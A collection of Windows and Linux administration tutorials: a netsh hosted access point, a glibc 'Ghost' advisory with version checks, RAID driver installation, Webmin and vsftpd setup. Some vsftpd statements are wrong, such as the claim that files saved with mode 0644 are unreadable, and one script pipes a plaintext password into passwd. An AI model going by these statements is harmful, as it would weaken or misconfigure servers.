Even though there are 3rd-party applications that will provide similar functionality, we believe this built-in feature is easy to configure and works well enough to make users think twice before purchasing such applications.

Windows 8 & 8.1 users can visit our article Configuring Windows 8 To Provide Secure Wireless Access Point Services to Wi-Fi Clients - Turn Windows 8 into an Access Point 

Creating Your Windows 7 Access Point

While there is no graphical interface that will allow you magically to turn Windows 7 into an access point, the configuration is performed via CLI using one single command. We should note that when turning a Windows 7 station into a Wi-Fi access point, it is necessary to ensure the station’s wired network card (RJ45) is connected to the local network (LAN) and has Internet access. Wireless clients that connect to the Windows 7 AP will obtain Internet access via the workstation’s wired LAN connection and will be located on a different subnet.

To begin, click on the Start button and enter cmd.exe in the Search Programs and Files area as shown below:

windows7-access-point-1

Next, right click on cmd.exe and select Run as administrator from the menu. This will open a DOS prompt with administrator privileges, necessary to execute the CLI command.

As mentioned earlier, a single command is required to create the Windows 7 access point and here it is:

netsh wlan set hostednetwork mode=allow "ssid=myssid" "key=mykey" keyUsage=persistent

The only parameters that will need to change from the above command are the ssid and key parameters. All the rest can be left as is. The ssid parameter configures the ssid that will be broadcast by the Windows 7 operating system, while the key parameter defines the WPA2-Personal key (password) that the clients need to enter in order to connect to the Wi-Fi network.

Following is an example that creates a wireless network named Firewall.cx with a WPA2 password of $connect$here :

C:\Windows\system32> netsh wlan set hostednetwork mode=allow "ssid=Firewall.cx" "key=$connect$here" keyUsage=persistent

The hosted network mode has been set to allow.

The SSID of the hosted network has been successfully changed.

The user key passphrase of the hosted network has been successfully changed.

C:\Windows\system32>

When executed, the above command creates the required Microsoft Virtual WiFi Miniport adapter and sets up the hosted network. The new Microsoft Virtual WiFi Miniport adapter will be visible in the Network Connections panel as shown below. In our example the adaptor is named Wireless Network Connection 2. Note that this is a one-time process and users will not need to create the adaptor again:

windows7-access-point-2

Next step is to start the hosted wireless network. The command to start/stop the hostednetwork is netsh wlan start|stop hostednetwork and needs to be run as administrator. Simply run the command in the same DOS prompt previously used:

C:\Windows\system32>netsh wlan start hostednetwork

The hosted network started.

C:\Windows\system32>

Notice how our Wireless Network Connection 2 has changed status and is now showing our configured SSID Firewall.cx:

windows7-access-point-3

To stop the hosted network, repeat the above command with the stop parameter:

C:\Windows\system32>netsh wlan stop hostednetwork
The hosted network stopped.

Starting The WLAN via Shortcuts – Making Life Easy

Users who frequently use the above commands can quickly create two shortcuts to start/stop the hosted network. 

To help save time and trouble, we've created the two shortcuts and made them available for download in our Administrator Utilities Download Section.  Simply download them and unzip the shortcuts directly on the desktop:

windows7-access-point-4

Double-clicking on each shortcut will start or stop the hosted network. Users experiencing problems starting or stopping the hosted network can right-click on the shortcuts and select Run as administrator.
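If you prefer to create the batch files yourself rather than download the ready-made shortcuts, their contents are minimal; each file simply wraps the corresponding netsh command shown above (remember to run them as administrator):

rem start-ap.bat - start the Windows 7 hosted network (access point)
netsh wlan start hostednetwork

rem stop-ap.bat - stop the Windows 7 hosted network
netsh wlan stop hostednetwork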

 

Enable Internet Connection Sharing  (ICS)

With our hosted network initiated, all that’s required is to enable Internet Connection Sharing on Windows 7. This will force our newly created hosted network (access point) to provide Internet and DHCP services to our wireless clients.

To enable Internet Connection Sharing, go to Control Panel > Network and Internet > Network and Sharing Center and select Change Adaptor Settings from the left menu. Right-click on the computer’s LAN network adaptor (usually Local Area Connection) and select properties:

windows7-access-point-5

Next, select the Sharing tab and enable the Internet Connection Sharing option. Under Home networking connection select the newly created wireless network connection, in our example this was Wireless Network Connection 2, and untick Allow other network users to control or disable the shared Internet connection setting as shown below:

windows7-access-point-6

After clicking on OK to accept the changes, we can see that the Local Area Connection icon now has the shared status next to it, indicating this is now a shared connection:

windows7-access-point-7

At this point, our Windows 7 system has transformed into an access point and is ready to serve wireless clients!

Note: Users with Cisco VPN Client installed will experience problems (Error 442) when trying to connect to VPN networks after enabling ICS. To resolve this issue, simply visit our popular How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Connecting Wireless Clients To Our Wi-Fi Network

Wireless clients can connect to the Windows 7 access point as they would with any normal access point. We connected with success to our Windows 7 access point (SSID: Firewall.cx) without any problem, using a Samsung Galaxy S2 android smartphone:

windows7-access-point-8

After successfully connecting and browsing the Internet from our android smartphone, we wanted to test this setup and see if using a Windows 7 system as an access point had any impact on wireless and Internet browsing performance.

Comparing Real Access Point Performance With A Windows 7 O/S Access Point

To test this out we used a Cisco 1041N access point, which was placed right next to our android smartphone and configured with an SSID of firewall. Both Windows 7 system and Cisco access point were connected to the same LAN network and shared the same Internet connection – a 10,000 Kbps DSL line (~10Mbps).

The screenshot below confirms our android smartphone had exceptional Wi-Fi signal with both access points:

windows7-access-point-9

Keep in mind, the Wi-Fi with SSID firewall belongs to the Cisco 1041N access point, while SSID Firewall.cx belongs to the Windows 7 access point.

We first connected to the Windows 7 access point and ran our tests. Maximum download speed was measured at 6,796Kbps, or around 6.6Mbps:

windows7-access-point-10

Next, we connected to our Cisco 1041N access point and performed the same tests. Maximum download speed was measured at 7,460Kbps, or 7.3Mbps:

windows7-access-point-11

Obviously there was a very small difference in performance, however, this difference is so small that it is hard to notice unless running these kind of tests. In both cases, Internet access was smooth without any interruptions or problems.

Summary

Being able to transform a Windows 7 system into an access point is a handy and much-welcomed feature. We’ve used it many times to overcome situations where no access point was available, and it worked fine every time. Performance is solid, with only a small degradation in speed that most users will never notice.

While this setup is not designed as a permanent access point solution, it can get you out of difficult situations and can serve a small number of wireless clients without any problem.


Critical 15 Year-old Linux Security Hole (Ghost) Revealed

linux-ghost-security-gnu-lib-vulnerability-1

Security researchers at qualys.com yesterday released information on a critical 15 year-old Linux security hole which affects millions of Linux systems dating back to the year 2000. The newly published security hole – code named ‘Ghost’ – was revealed yesterday by Qualys’ security team on openwall.com.

The security hole was found in the __nss_hostname_digits_dots() function of the GNU C Library (glibc).

The function is used on almost all networked Linux computers when the computer tries to access another networked computer, either by using the /etc/hosts file or, more commonly, by resolving a domain name with the Domain Name System (DNS).

As noted by the security team, the bug is reachable both locally and remotely via the gethostbyname*() functions, making it possible to exploit it remotely by triggering a buffer overflow with an invalid hostname argument to an application that performs DNS resolution.

The security hole exists in any Linux system that was built with glibc-2.2, which was released on November 10th, 2000. Qualys mentioned that the bug was patched on May 21st, 2013 in releases glibc-2.17 and glibc-2.18.

Linux systems that are considered vulnerable to the attack include RedHat Enterprise Linux 5, 6 and 7, CentOS 6 and 7, Ubuntu 12.04 and Debian 7 (Wheezy).

Debian is already patching its core systems (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776391), while Ubuntu has already patched its 12.04 and 10.04 distributions (https://www.ubuntu.com/usn/usn-2485-1/). CentOS patches are also on their way.
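A quick way to check whether a system still carries a vulnerable glibc is to query the installed version; anything older than glibc-2.17/2.18 that has not received a backported fix from the distribution should be treated as vulnerable. For example (this only verifies the version, it does not test the exploit itself):

# rpm -q glibc          (RedHat Enterprise Linux, CentOS, Fedora)
# dpkg -l libc6         (Debian, Ubuntu)
# ldd --version         (any distribution – prints the glibc version in use)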


Linux CentOS - Redhat EL Installation on HP Smart Array B110i SATA RAID Controller - HP ML/DL Servers

This article was written following our recent encounter with an HP DL120 G7 rack mount server, equipped with an HP Smart Array B110i SATA RAID controller, that needed to be installed with the Linux CentOS 6.0 operating system. The HP Smart Array B110i SATA RAID controller is found on a variety of HP servers, therefore this procedure can be applied to all HP servers equipped with the Smart Array B110i controller.

As with all articles, we have included step-by-step instructions for installing the HP Smart Array B110i SATA RAID controller drivers, including screenshots (from the server’s monitor), files, drivers and utilities that might be needed.

Provided Download Files:  HP Smart Array B110i Drivers (Redhat 6.0, CentOS 6.0), RawWrite & Win32DiskImager 

The HP SmartArray B110i Story

What was supposed to be a pretty straightforward process turned into a 3-hour troubleshooting session to figure out how to install the necessary Smart Array B110i drivers so that our CentOS 6.0 or RedHat Enterprise Linux 6.0 install process would recognize our RAID volumes and proceed with the installation of the operating system.

A quick search on Google revealed that we were not alone – hundreds of people seem to have struggled with the same issue long before we did, however we couldn’t locate an answer that provided full instructions on how to deal with the problem, so, we decided to create one that did!

Installation Steps

The first step is to enter the server’s BIOS and enable SATA RAID Support. This essentially enables the controller and allows RAID setup from within it. On the HP DL120 G7 this option was under the Advanced Options > Embedded SATA Configuration > Enable SATA RAID Support menu:

linux HP b110i installation

Next step is to save and exit the BIOS.  

While the server restarts, press F8 when prompted to enter the RAID controller menu and create the necessary RAID and logical volumes. We created two logical drives in a RAID 0 configuration, with 9.3GB & 1.8TB capacity:

HP b110i logical drive configuration

Next, it was time to prepare the necessary driver disk so that the operating system can ‘see’ the raid controller and drives created. For this process, two things are needed:

  • Correct Disk Driver
  • Create Driver Diskette

Selecting The Correct Disk Driver

HP offers drivers for the B110i controller for a variety of operating systems, including Redhat and SUSE, both for Intel and AMD based CPU systems. The driver diskette image provides the binary driver modules pre-built for Linux, which enables the HP Smart Array B110i SATA RAID Controller. CentOS users can make use of the Redhat drivers without hesitation.

For this article we are providing as a direct download, drivers for RedHat Enterprise Linux & CentOS v6.0 for Intel and AMD 64bit processors (x86-64bit). These files are available at our Linux download section.

If a diskette driver for earlier or later systems is required, we advise visiting HP’s website and searching for the term “Driver Diskette for HP Smart Array B110i”, which will produce a good number of results for all operating systems.

Driver diskette file names have the format “hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz” where rhel represents the operating system (RedHat Enterprise Linux), 6u0 stands for update 0 (version 6, update 0 = 6.0) and x86_64 for the system architecture covering x86 platforms (Intel & AMD).

Writing Image To Floppy Disk Or USB Flash

The driver diskette must be uncompressed using a utility such as 7zip (freely available). Uncompressing the file reveals the file dd.img. This is the driver disk image that needs to be written to a floppy disk or USB flash drive.

Linux users can use the following command to write the uncompressed dd.img image to their driver diskette. Keep in mind to substitute /dev/sdb with your USB or floppy device:

# dd if=dd.img of=/dev/sdb
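Alternatively, the image can be decompressed and written in a single step straight from the downloaded .gz file; this is only a convenience and assumes, as above, that /dev/sdb is your USB or floppy device:

# zcat hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz > /dev/sdb
# sync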

Windows users can use RawWrite if they wish to write it to a floppy disk drive or Win32DiskImager to write it to a USB Flash. Both utilities are provided with our disk driver download. Since we had a USB floppy disk drive in hand, we selected RawWrite:

rawwrite usage and screenshot

Loading The Driver Diskette

With the driver diskette ready, it’s time to begin the CentOS installation, by booting from the DVD:

centos 6.0 welcome installation

At the installation menu, hit ESC to receive the boot: prompt. At the prompt, enter the following command: linux dd blacklist=ahci and hit enter to begin installation as shown below:

centos 6 initrd.img driver installation

The initial screen of the installation GUI will allow you to load the driver diskette created. At the question, select Yes and hit enter:

linux-b110i-installation-6

The next screen instructs us to insert the driver disk into /dev/sda and press OK. The location /dev/sda refers to our USB floppy drive, connected to one of our HP server's USB ports during bootup:

linux-b110i-installation-7

The system will present a screen with the message Reading driver disk, indicating the driver is loading and once complete, the message detecting hardware … waiting for hardware to initialize… will appear:

linux-b110i-installation-8

Finally, the installation procedure asks if you wish to load any more driver disks. We answered No and the installation procedure continued as expected. We saw both logical disks and were able to successfully install and use them without any problem:

linux centos logical drive setup

We hope this brief article will help thousands of engineers around the world save a bit of their valuable time!


Installing & Configuring Linux Webmin - Linux Web-Based Administration

For many engineers and administrators,  maintaining a Linux system can be a daunting task, especially if there’s limited time or experience.  Working in shell mode, editing files, restarting services, performing installations, configuring scheduled jobs (Cron Jobs) and much more, requires time, knowledge and patience.

One of the biggest challenges for people who are new to Linux is to work with the operating system in an easy and manageable way, without having to know all the commands and file paths in order to get the job done.

All this has now changed, and you can now do all the above, plus a lot more, with a few simple clicks through an easy-to-follow web interface.  Sounds too good to be true?  Believe it or not, it is true!  It's time to get introduced to ‘Webmin’.

Webmin is a free program that provides a web-based interface for system administration and acts as a system configuration tool for administrators. One of Webmin's strongest points is that it is modular, which means there are hundreds of extra modules/addons that can be installed to provide the ability to control additional programs or services someone might want to install on their Linux system.

Here are just a few of the features supported by Webmin, out of the box:

  • Setup and administer user accounts
  • Setup and administer groups
  • Setup and configure DNS services
  • Configure file sharing & related services (Samba)
  • Setup your Internet connection (including ADSL router, modem etc)
  • Configure your Apache webserver
  • Configure a FTP Server
  • Setup and configure an email server
  • Configure Cron Jobs
  • Mount, dismount and administer volumes, hdd's and partitions
  • Setup system quotas for your users
  • Built-in file manager
  • Manage an OpenLDAP server
  • Setup and configure VPN clients
  • Setup and configure a DHCP Server
  • Configure a SSH Server
  • Setup and configure a Linux Proxy server (squid) with all supported options
  • Setup and configure a Linux Firewall
  • and much much more!!!

The great part is that webmin is supported on all Linux platforms and is extremely easy to install.  While our example is based on Webmin's installation on a Fedora 16 server using the RPM package, these steps will also work on other versions such as Red Hat, CentOS and other Linux distributions.

Before we dive into Webmin, let's take a quick look at what we've got covered:

  • Webmin Installation
  • Adding Users, Groups and Assigning Privileges
  • Listing and Working with File Systems on the System
  • Creating and Editing Disk Quotas for Unix Users
  • Editing the System Boot up, Adding and Removing Services
  • Managing and Examining System Log Files
  • Setting up and Changing System Timezone and Date
  • Managing DNS Server & Domain
  • Configuring DHCP Server and Options
  • Configuring FTP Server and Users/Groups
  • How to Schedule a Backup
  • Configuring CRON Jobs with Webmin
  • Configuring SSH Server with Webmin
  • Configuring Squid Proxy Server
  • Configuring Apache HTTP Server

Installing Webmin On Linux Fedora / Redhat / CentOS

Download the required RPM file from http://download.webmin.com/download/yum/ using the command (note the root status):

# wget http://download.webmin.com/download/yum/webmin-1.580-1.noarch.rpm

Install the RPM file of Webmin with the following command:

# rpm -Uvh webmin-1.580-1.noarch.rpm

Start Webmin service using the command:

# systemctl start webmin.service

You can now log in to https://Fedora-16:10000/ as root with your root password. To access your Webmin administration interface from any machine, simply use the URL https://your-linux-ip:10000, where "your-linux-ip" is your Linux server's or workstation's IP address.
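Note: if the login page cannot be reached, the system firewall may be blocking Webmin's port. On an iptables-based system such as our Fedora 16 server, the port can be opened with a rule along the following lines (an example only – adjust it to your own firewall policy and save it with your distribution's usual mechanism, e.g. service iptables save on RedHat-based systems):

# iptables -I INPUT -p tcp --dport 10000 -j ACCEPT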

Running Webmin

Open Firefox or any other browser, and type the URL https://Fedora-16:10000/ :

linux-webmin-1

 

You will be greeted with a welcome screen. Login as root with your root password. Once you are logged in, you should see the system information:

linux-webmin-2

Adding Users, Groups And Assigning Them Privileges

Expand the "System" Tab in the left column index, and select the last entry “Users and Groups”.  You will be shown the list of the "Local Users" on the system:

linux-webmin-3

You can add users or delete them from this window. If you want to change the parameters of any user, you can do so. By clicking on any user, you can see the groups and privileges assigned to them. These can be changed as you like. For example, if you select the user "root", you can see all the details of the user as shown below :

linux-webmin-4

By selecting the adjacent tab in the "Users and Groups" window, you can see the "Local Groups" as well:

linux-webmin-5

Here, you can see the members in each group by selecting that group. You can delete a group or add a new one. You can select who will be the member of the group, and who can be removed from a group. For example, you can see all the members in the group "mem", if you select and open it:

linux-webmin-6

Here, you will be allowed to create a new group or delete selected groups. You can also add users to the groups or remove them as required. If needed, you can also change the group ID on files and modify a group in other modules as well.

Listing And Working With File Systems On The System

By selecting "Disk and Network Filesystems" under the "System" tab on the left index, you can see the different file systems currently mounted.

linux-webmin-7

You can select another type of file system you would like to mount. Select it from the drop-down menus as shown:

linux-webmin-8

By selecting a mounted file system, you can edit its details, such as whether it should be mounted at boot time, remain mounted or be unmounted now, and whether the file system should be checked at boot time. Mount options such as read-only, executable and permissions can also be set here.

Creating And Editing Disk Quotas For Unix Users

A key consideration prior to Linux installation is the /home directory.

Virtual hosts are set up under /home by almost every control panel, since Users & Groups, the FTP server, user shells, Apache and several other services keep their data on this partition. For this reason, /home should be created as a logical volume on a native Linux file system (ext3). Here it is assumed there is already a /home partition on the system.

You can set the quotas by selecting “Disk & Network Filesystems” under “System”:

linux-webmin-9

This allows you to create and edit disk quota for the users in your /home partition or directory. Each user is given a certain amount of disk space he can use. Going close to filling up the quota will generally send a warning.

You can also edit other mounts such as the root directory "/" and also set a number of presented mount options:

linux-webmin-10

Editing The System Boot Up, Adding And Removing Services

All Systemd services are neatly listed in the "Bootup and Shutdown" section within "System":

linux-webmin-11

All service related functions such as start, stop, restart, start on boot, disable on boot, start now and on boot, and disable now and on boot are available at the bottom of the screen. This makes system bootup process modification a breeze, even for the less experienced:

linux-webmin-12

The "Reboot System" and "Shutdown System" function buttons are also located at the bottom, allowing you to immediately reboot or shut down the system.

Managing And Examining System Log Files

Who would have thought managing system log files in Linux would be so easy? Webmin provides a dedicated section allowing the administrator to make a number of changes to the preferences of each system log file. The friendly interface shows all available system log files and their location. By clicking on the one of interest, you can see its properties and make the changes you require.

The following screenshot shows the "System Logs" listed in the index under "System" menu option:

linux-webmin-13

All the logs are available for viewing and editing. The screenshot below shows an example of editing the maillog. Through the interface, you can enable or disable logs and make a number of other changes on the fly:

linux-webmin-14

Another entry under "System" is the important function of "Log File Rotation". This allows you to edit which log file you would like to rotate and how (daily, weekly or monthly). You can define what command will be executed after the log rotation is done. You can also delete the selected log rotations:

linux-webmin-15

Log rotation is very important, especially on a busy system as it will ensure the log files are kept to a reasonable and manageable size.

Setting Up And Changing System Timezone/Date

Webmin also supports setting up system time and date. To do so, you will have to go to "System Time" under "Hardware" in the main menu index.

linux-webmin-16

System time and hardware time can be separately set and saved. These can be made to match if required.

On the next tab you will be able to change the Timezone:

linux-webmin-17

The next tab is the 'Time Server Sync', used for synchronizing to a time-server. This will ensure your system is always in sync with the selected time-server:

linux-webmin-18

Here, you will be able to select a specific timeserver with a hostname or address and set the schedule when the periodic synchronizing will be done.

Managing DNS Server & Domain

DNS Server configuration is possible from the "Hostname and DNS Client", which is located under "Networking Configuration" within "Networking" in the index:

linux-webmin-19

Here you can set the Hostname of the machine, the IP Address of the DNS Servers and their search domains and save them.

Configuring DHCP Server And Options

For configuration of your system's DHCP server, go to “DHCP Server” within “System and Server Status” under “Others”:

linux-webmin-20

All parameters related to DHCP server can be set here:

linux-webmin-21

Configuring FTP Server And Users/Groups

For ProFTPD Server, select “ ProFTPD Server” under “Servers”. You will see the main menu for ProFTPD server:

linux-webmin-22

You can see and edit the Denied FTP Users if you select the "Denied FTP Users":

linux-webmin-23

Configuration file at /etc/proftpd.conf can be directly edited if you select the "Edit Config Files" in the main menu:

linux-webmin-24

How To Schedule A Backup

Backing up, scheduling and restoring configuration files can all be done from “Backup Configuration Files” under “Webmin”.

In the “Backup Now” window, you can set the modules, the backup destination, and what you want included in the backup.   The backup can be a local file on the system, a file on an FTP server, or a file on an SSH server. For both the servers, you will have to provide the username and password. Anything else that you would like to include during the backup such as webmin module configuration files, server configuration files, or other listed files can also be mentioned here:

linux-webmin-25

If you want to schedule your Backups go to the next tab “Scheduled Backups” and select the “Add a new scheduled backup”, since, as shown, no scheduled backup has been defined yet:

linux-webmin-26

 

linux-webmin-27

Then set the exact backup schedule options. The information is nearly the same as for Backup Now; however, you now also have the choice of setting schedule options such as Months, Weekdays, Days, Hours, Minutes and Seconds.

linux-webmin-28

 Restoration of modules can be selected from the “Restore Now” tab:

linux-webmin-29

The options for restore now follow the same pattern as for the backup. You have the options for restoring from a local file, an FTP server, an SSH server, and an uploaded file. Apart from providing the username and passwords for the servers, you have the option of only viewing what is going to be restored, without applying the changes.

Configuring CRON Jobs With Webmin

Selecting the “Scheduled Cron Jobs” under “System” will allow creation, deletion, disabling and enabling of Cron jobs, as well as controlling user access to cron jobs. The interface also shows the users who are active and their current cron-jobs. The jobs can be selectively deleted, disabled or enabled (if disabled earlier).

linux-webmin-30

For creating a new cron job and scheduling it, select the tab “Create a new scheduled cron job”. You have the options of setting the Months, Weekdays, Days, Hours, Minutes. You have the option of running the job on any date, or running it only between two fixed dates:

linux-webmin-31

For controlling access to Cron jobs, select the next tab “Control User Access to Cron Jobs” in the main menu:

linux-webmin-32

Configuring SSH Server With Webmin

Selecting “SSH Server” under “Servers” will allow all configuration of the SSH Server:

linux-webmin-33

Access Control is provided by selecting the option "Access Control" from the main menu :

linux-webmin-34

Miscellaneous options are available when the "Miscellaneous Options" is selected from the main menu:

linux-webmin-35

The SSH config files can be accessed directly and edited by selecting “Edit Config Files” from the main menu.

linux-webmin-36

Configuring Squid Proxy Server

Select “Squid Proxy Server” under “Servers”. The main menu shows what all can be controlled there:

linux-webmin-37

Selecting “Access Control” allows you to manage ACLs, proxy restrictions, ICP restrictions, external ACL programs, and reply proxy restrictions:

linux-webmin-38

 

linux-webmin-39

Configuring Apache HTTP Server

You can configure “Apache Webserver” under “Servers”. The main menu shows what you can configure there.

All Global configuration can be done from the first tab:

linux-webmin-40

You can also configure the existing virtual hosts or create a virtual host, if you select the other tabs:

linux-webmin-41

Users and Groups who are allowed to run Apache are mentioned here (select from the main menu):

linux-webmin-42

Apache configuration files can be directly edited from the main menu.

All the configuration files, httpd.conf, sarg.conf, squid.conf, and welcome.conf can be directly edited from this interface:

linux-webmin-43

Any other service or application that you cannot locate directly in the index on the left can be found by entering its name in the search box on the left. If the item searched for is not installed, Webmin will offer to download the RPM and install it. A corresponding entry will then appear in the index on the left and you can proceed to configure the service or application. After installing an application or service, modules can be refreshed as well. From the Webmin interface, you can also view the module's logs.


Installing & Configuring VSFTPD FTP Server for Redhat Enterprise Linux, CentOS & Fedora

Vsftpd is a popular FTP server for Unix/Linux systems. For those unaware of the vsftpd FTP server, note that this is not just another FTP server, but a mature product that has been around for over 12 years in the Unix world. While vsftpd is found as an installation option on many Linux distributions, complete installation and configuration instructions for it are not easy to come by, which is the reason we decided to cover it on Firewall.cx.

This article focuses on the installation and setup of the Vsftpd service on Linux Redhat Enterprise, Fedora and CentOS, however it is applicable to almost all other Linux distributions.  We'll also take a look at a number of great tips which include setting quotas, restricting access to anonymous users, disabling uploads, setting a dedicated partition for the FTP service, configuring the system's IPTable firewall and much more.

VSFTPD Features

Following is a list of vsftpd's features which confirms this small FTP package is capable of delivering a lot more than most FTP servers out there:

  • Virtual IP configurations
  • Virtual users
  • Standalone or inetd operation
  • Powerful per-user configurability
  • Bandwidth throttling
  • Per-source-IP configurability
  • Per-source-IP limits
  • IPv6
  • Encryption support through SSL integration
  • and much more....!

Installing The VSFTPD Linux Server

To initiate the installation of the vsftpd package, simply open your CLI prompt and use the yum command (you need root privileges) as shown below:

# yum install vsftpd

Yum will automatically locate, download and install the latest vsftpd version.

Configure VSFTPD Server

To open the configuration file, type:

# vi /etc/vsftpd/vsftpd.conf

Turn off standard ftpd xferlog log format and turn on verbose vsftpd log format by making the following changes in the vsftpd.conf file:

xferlog_std_format=NO
log_ftp_protocol=YES
Note: the default vsftpd log file is /var/log/vsftpd.log.

The above two directives will enable logging of all FTP transactions.

To lock down users to their home directories:

chroot_local_user=YES

You can create warning banners for all FTP users, by defining the path:

banner_file=/etc/vsftpd/issue

Now you can create the /etc/vsftpd/issue file with a message compliant with the local site policy or a legal disclaimer:

“NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address”.

Turn On VFSTPD Service

Turn on vsftpd on boot:

# systemctl enable vsftpd.service

Start the service:

# systemctl start vsftpd.service

You can verify the service is running and listening on the correct port using the following command:

# netstat -tulpn | grep :21

Here's the expected output:

tcp   0  0 0.0.0.0:21  0.0.0.0:*   LISTEN   9734/vsftpd

Configure IPtables To Protect The FTP Server

In case IPTables are configured on the system, it will be necessary to edit the iptables file and open the ports used by FTP to ensure the service's operation.

To open file /etc/sysconfig/iptables, enter:

# vi /etc/sysconfig/iptables

Add the following lines, ensuring that they appear before the final LOG and DROP lines for the RH-Firewall-1-INPUT:

-A RH-Firewall-1-INPUT -m state --state NEW -p tcp --dport 21 -j ACCEPT

Next, open file /etc/sysconfig/iptables-config, and enter:

# vi /etc/sysconfig/iptables-config

Ensure that the space-separated list of modules contains the FTP connection-tracking module:

IPTABLES_MODULES="ip_conntrack_ftp"

Save and close the file and finally restart the firewall using the following commands:

# systemctl restart iptables.service
# systemctl restart ip6tables.service

Tip: View FTP Log File

Type the following command:

# tail -f /var/log/vsftpd.log

Tip: Restricting Access to Anonymous User Only

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

local_enable=NO

Tip: To Disable FTP Uploads

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

write_enable=NO

Tip: To Enable Disk Quota

Disk quota should be enabled to prevent users from filling up the disk used by FTP upload services. Edit the vsftpd configuration file and add or correct the following option, which defines the directory vsftpd will try to change into after an anonymous login:

anon_root=/ftp/ftp/pub
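Keep in mind the anon_root directive only controls the directory anonymous sessions land in; the quota itself is enforced at the file-system level using the standard Linux quota tools. A minimal sketch, assuming the FTP partition is mounted with the usrquota option (see the fstab example further below) and using the local user 'bob' from the script that follows:

# quotacheck -cum /ftp      (build the user quota file on the /ftp partition)
# quotaon /ftp              (enable quota enforcement)
# edquota -u bob            (interactively set block and inode limits for the user)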

The ftp users are the same users as those on the hosting machine.

You could have a separate group for ftp users, to help keep their privileges down (for example 'anonftpusers'). Knowing that, your script should do:

useradd -d /www/htdocs/hosted/bob -g anonftpusers -s /sbin/nologin bob
echo bobspassword | passwd --stdin bob
echo bob >> /etc/vsftpd/user_list

Be extremely careful with your scripts, as they will have to be run as root.

However, for this to work you will have to have the following options enabled in /etc/vsftpd/vsftpd.conf

userlist_enable=YES
userlist_deny=NO

Security Tip: Place The FTP Directory On Its Own Partition

Separation of the operating system files from FTP users files may result into a better and secure system. Restricting the growth of certain file systems is possible using various techniques. For example, use /ftp partition to store all ftp home directories and mount ftp with nosuid, nodev and noexec options. A sample /etc/fstab entry:

/dev/sda5  /ftp  ext3  defaults,nosuid,nodev,noexec,usrquota 1 2
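After editing /etc/fstab, the new mount options can be applied without a reboot by remounting the partition and then verifying the active options (assuming /ftp is already mounted):

# mount -o remount /ftp
# mount | grep /ftp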

Example File For vsftpd.conf

Following is an example vsftpd.conf. It allows the users listed in the user_list file to log in, denies anonymous users, and places quite tight restrictions on what users can do:

# Allow anonymous FTP?
anonymous_enable=NO
#
# Allow local users to log in?
local_enable=YES
#
# Allow any form of FTP write command.
write_enable=YES
#
# To make files uploaded by your users writable by only
# themselves, but readable by everyone; and if, through some
# misconfiguration, an anonymous user manages to upload a file,
# the file will have no read, write or execute permission. Just to be safe.
local_umask=0000
file_open_mode=0644
anon_umask=0777
#
# Allow the anonymous FTP user to upload files?
anon_upload_enable=NO
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=NO
#
# Activate logging of uploads/downloads?
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data)?
connect_from_port_20=YES
#
# Log file in standard ftpd xferlog format?
xferlog_std_format=NO
#
# User for vsftpd to run as?
nopriv_user=vsftpd
#
# Login banner string:
ftpd_banner= NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address.
#
# chroot local users (only allow users to see their directory)?
chroot_local_user=YES
#
# PAM service name?
pam_service_name=vsftpd
#
# Enable user_list (see next option)?
userlist_enable=YES
#
# Should the user_list file specify users to deny(=YES) or to allow(=NO)
userlist_deny=NO
#
# Standalone (not run through xinetd) listen mode?
listen=YES
#
#
tcp_wrappers=NO
#
# Log all ftp actions (not just transfers)?
log_ftp_protocol=YES
# Initially YES for trouble shooting, later change to NO
#
# Show file ownership as ftp:ftp instead of real users?
hide_ids=YES
#
# Allow ftp users to change permissions of files?
chmod_enable=NO
#
# Use local time?
use_localtime=YES
#
# List of raw FTP commands, which are allowed (some commands may be a security hazard):
cmds_allowed=ABOR,QUIT,LIST,PASV,RETR,CWD,STOR,TYPE,PWD,SIZE,NLST,PORT,SYST,PRET,MDTM,DELE,MKD,RMD

With this config, uploaded files are not readable or executable by anyone, so the server is acting as a 'dropbox'. Change the file_open_mode option to change that.

Lastly, it is also advised to have a look at 'man vsftpd.conf' for a full list and description of all options.


Updating Your Linux Server - How to Update Linux Workstations and Operating Systems

Like any other software, an operating system needs to be updated. Updates are required not only because of the new hardware coming into the market, but also for improving the overall performance and taking care of security issues.

Updates are usually done in two distinct ways: the incremental update and the major update. In incremental updates, components of the operating system undergo minor modifications. Users are usually informed of such modifications over the net and can download and install them serially using the update management software.

However, some major modifications require so many changes involving several packages simultaneously that it becomes rather complicated to accomplish them serially over the net. This type of modification is best done with a fresh installation, after acquiring the improved version of the operating system.

Package management is one of the most distinctive features distinguishing major Linux distributions. Major projects offer a graphical user interface where users can select a package and install it with a mouse click. These programs are front-ends to the low-level utilities that manage the tasks associated with installing packages on a Linux system. Although many desktop Linux users feel comfortable installing packages through these GUI tools, command-line package management offers two excellent features not available in any graphical package management utility: power and speed.

The Linux world is sharply divided into three major groups, each swearing by the type of package management they use - the “RPM” group, the “DEB” group and the “Slackware” group. There are other fragment groups using different package management types, but they are comparatively minor. Among the three groups, RPM and DEB are by far the most popular and several other groups have been derived from them. Some of the Linux distributions that handle these package managements are:

RPM - RedHat Enterprise/Fedora/CentOS/OpenSUSE/Mandriva, etc.

DEB - Debian/Ubuntu/Mint/Knoppix, etc.

RPM - RedHat Package Manager

Although RPM was originally used by RedHat, this package management is handled by different types of package management tools specific to each Linux distribution. While OpenSUSE uses the “zypp” package management utility, RedHat Enterprise Linux (REL), Fedora and CentOS use “yum”, and Mandriva and Mageia use “urpmi”.

Therefore, if you are an OpenSUSE user, you will use the following commands:

For updating your package list: zypper refresh

For upgrading your system: zypper update

For installing new software pkg: zypper install pkg (from package repository)

For installing new software pkg: zypper install pkg  (from package file)

For updating existing software pkg: zypper update -t package pkg

For removing unwanted software pkg: zypper remove pkg

For listing installed packages: zypper search -ls

For searching by file name: zypper wp file

For searching by pattern: zypper search -t pattern pattern

For searching by package name pkg: zypper search pkg

For listing repositories: zypper repos

For adding a repository: zypper addrepo pathname

For removing a repository: zypper removerepo name

 

If you are a Fedora or CentOS user, you will be using the following commands:

For updating your package list: yum check-update

